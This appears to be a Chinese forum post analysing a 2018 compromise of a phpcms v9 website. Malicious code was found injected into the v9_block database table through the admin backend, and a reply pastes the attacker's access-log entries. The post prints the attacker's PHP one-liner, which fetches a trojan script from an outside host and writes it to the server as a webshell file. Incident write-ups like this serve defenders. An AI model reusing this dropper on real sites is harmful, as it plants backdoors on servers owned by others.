热搜词
发表于 2018-5-14 15:25:33 | 显示全部楼层 |阅读模式
采用 phpcms v9建设的网站,今天打开首页,发现网站显示异常,截图如下:
01.png


首先我怀疑空间里被置入了恶意代码,于是立即登录FTP查看空间里的网页文件,查看了网站模板文件有没有被改动过,没有发现异常,又把 phpmcs v9 源文件与空间里的文件对比一次,也没有发现改动过的文件,又把网站下载到本地,也没有查杀到木马文件,感觉非常奇怪,一时陷入困境之中,找不到解决思路。

经过好长一段时间思索,终于找到了一条思路,是不是恶意代码被写入数据库中了呢,于是用phpmyadmin数据库管理软件远程打开数据库文件,查看相关数据表,最终在“v9_block”碎片数据表中发现恶意代码,那这段代码是怎么写进去的呢,我认真思索了一下,这段碎片代码应该在网站管理后台就能添加进去的,于是用管理员账号登录网站管理后台,网站管理员确实有添加碎片的功能,到此为此,这段恶意代码插入原理终于搞明白 了。以下为管理后台插入的恶意代码截图:

02.png

插入的恶意代码如下:
<?php
$f=file_get_contents('http://www.bfbcp07.com/cywlteam123.txt');print_r(fwrite(fopen('cywlteam123.php','a'),$f));phpinfo();
?>
这段代码中的'http://www.bfbcp07.com/cywlteam123.txt'文件是一个脚本木马文件,打开后内容如下:

03.png

黑客攻击日志与流程:
04.png

05.png

06.png


全部评论1
灰儿 发表于 2018-5-14 18:21:29 | 显示全部楼层
114.227.103.150 - - [13/May/2018:22:31:12 +0800] "GET / HTTP/1.1" 200 12083 "https://www.sogou.com/link?url=DSOYnZeCC_pU0ia26t2md2QJ6AJM-tu1reaVHN88tHY." "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:15 +0800] "GET /uploadfile/2013/0730/20130730031210319.php HTTP/1.1" 404 470 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:15 +0800] "GET /index.php?m=poster&c=index&a=show_poster&id=2 HTTP/1.1" 200 280 "http://www.shxcb.gov.cn/" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:32 +0800] "GET /index.php?m=admin&c=index&pc_hash=B1NGqW HTTP/1.1" 200 1607 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:35 +0800] "GET /api.php?op=checkcode&code_len=4&font_size=20&width=130&height=50&font_color=&background= HTTP/1.1" 200 4006 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&a=login&pc_hash=" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:42 +0800] "POST /index.php?m=admin&c=index&a=login&dosubmit=1 HTTP/1.1" 200 2114 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&a=login&pc_hash=" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:44 +0800] "GET /index.php?m=admin&c=index&pc_hash=Ev3Dvi HTTP/1.1" 200 6320 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&a=login&dosubmit=1" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:44 +0800] "GET /index.php?m=admin&c=index&pc_hash=Ev3Dvi HTTP/1.1" 200 6320 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&a=login&dosubmit=1" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:46 +0800] "GET /index.php?m=admin&c=index&a=public_main HTTP/1.1" 200 2633 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:47 +0800] "GET /index.php?m=admin&c=index&a=public_menu_left&menuid=10 HTTP/1.1" 200 897 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:49 +0800] "POST /index.php?m=admin&c=index&a=public_menu_left&menuid=4 HTTP/1.1" 200 1285 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:49 +0800] "GET /index.php?m=admin&c=index&a=public_current_pos&menuid=4 HTTP/1.1" 200 427 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:51 +0800] "GET /index.php?m=admin&c=index&a=public_current_pos&menuid=857 HTTP/1.1" 200 453 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:51 +0800] "GET /index.php?m=attachment&c=manage&a=init&menuid=857&pc_hash=Ev3Dvi HTTP/1.1" 200 5018 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:52 +0800] "GET /index.php?m=attachment&c=manage&a=init&menuid=857&pc_hash=Ev3Dvi HTTP/1.1" 200 5018 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:52 +0800] "GET /index.php?m=admin&c=index&a=public_current_pos&menuid=868 HTTP/1.1" 200 453 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:52 +0800] "GET /index.php?m=special&c=special&a=init&menuid=868&pc_hash=Ev3Dvi HTTP/1.1" 200 2985 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:53 +0800] "GET /index.php?m=admin&c=index&a=public_current_pos&menuid=857 HTTP/1.1" 200 453 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:31:54 +0800] "GET /statics/images/admin_img/input.png HTTP/1.1" 200 1141 "http://www.shxcb.gov.cn/statics/css/table_form.css" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:32:03 +0800] "GET /index.php?m=special&c=special&a=add&menuid=868&pc_hash=Ev3Dvi&&pc_hash=Ev3Dvi HTTP/1.1" 200 4707 "http://www.shxcb.gov.cn/index.php?m=special&c=special&a=init&menuid=868&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:32:07 +0800] "GET /index.php?m=admin&c=category&a=public_tpl_file_list&style=shxcb&module=special&templates=index|list|show&name=special HTTP/1.1" 200 616 "http://www.shxcb.gov.cn/index.php?m=special&c=special&a=add&menuid=868&pc_hash=Ev3Dvi&&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:32:09 +0800] "GET /index.php?clientid=title&title=test&pc_hash=Ev3Dvi&m=special&c=special&a=public_check_special&_=1526221929587 HTTP/1.1" 200 418 "http://www.shxcb.gov.cn/index.php?m=special&c=special&a=add&menuid=868&pc_hash=Ev3Dvi&&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:32:15 +0800] "POST /index.php?m=special&c=special&a=add HTTP/1.1" 200 1681 "http://www.shxcb.gov.cn/index.php?m=special&c=special&a=add&menuid=868&pc_hash=Ev3Dvi&&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:32:17 +0800] "GET /index.php?m=special&c=special&a=add&menuid=868&pc_hash=Ev3Dvi&&pc_hash=Ev3Dvi HTTP/1.1" 200 4707 "http://www.shxcb.gov.cn/index.php?m=special&c=special&a=add" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:32:18 +0800] "GET /index.php?m=admin&c=category&a=public_tpl_file_list&style=shxcb&module=special&templates=index|list|show&name=special HTTP/1.1" 200 616 "http://www.shxcb.gov.cn/index.php?m=special&c=special&a=add&menuid=868&pc_hash=Ev3Dvi&&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:32:20 +0800] "GET /index.php?clientid=title&title=tt&pc_hash=Ev3Dvi&m=special&c=special&a=public_check_special&_=1526221939764 HTTP/1.1" 200 418 "http://www.shxcb.gov.cn/index.php?m=special&c=special&a=add&menuid=868&pc_hash=Ev3Dvi&&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:32:33 +0800] "POST /index.php?m=special&c=special&a=add HTTP/1.1" 200 1681 "http://www.shxcb.gov.cn/index.php?m=special&c=special&a=add&menuid=868&pc_hash=Ev3Dvi&&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:32:37 +0800] "GET /index.php?m=special&c=special&a=init&menuid=868&pc_hash=Ev3Dvi HTTP/1.1" 200 3241 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:32:37 +0800] "GET /index.php?m=special&c=special&a=add&menuid=868&pc_hash=Ev3Dvi&&pc_hash=Ev3Dvi HTTP/1.1" 200 4702 "http://www.shxcb.gov.cn/index.php?m=special&c=special&a=add" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:32:37 +0800] "GET /index.php?m=admin&c=index&a=public_current_pos&menuid=868 HTTP/1.1" 200 453 "http://www.shxcb.gov.cn/index.php?m=admin&c=index&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:32:38 +0800] "GET /1.jpg HTTP/1.1" 404 433 "http://www.shxcb.gov.cn/index.php?m=special&c=special&a=init&menuid=868&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:32:40 +0800] "GET /html/special/test/?pc_hash=Ev3Dvi HTTP/1.1" 200 264 "http://www.shxcb.gov.cn/index.php?m=special&c=special&a=init&menuid=868&pc_hash=Ev3Dvi" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"
114.227.103.150 - - [13/May/2018:22:32:43 +0800] "GET /cywlteam123.php HTTP/1.1" 404 443 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36"

access_20180513_黑客攻击日志.log (51.4 KB, 下载次数: 0)

回复

使用道具 举报

回复
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|Archiver|手机版|小黑屋|管理员之家 ( 苏ICP备2023053177号-2 )

GMT+8, 2024-12-29 02:45 , Processed in 0.166698 second(s), 26 queries .

Powered by Discuz! X3.5

Cpoyright © 2001-2024 Discuz! Team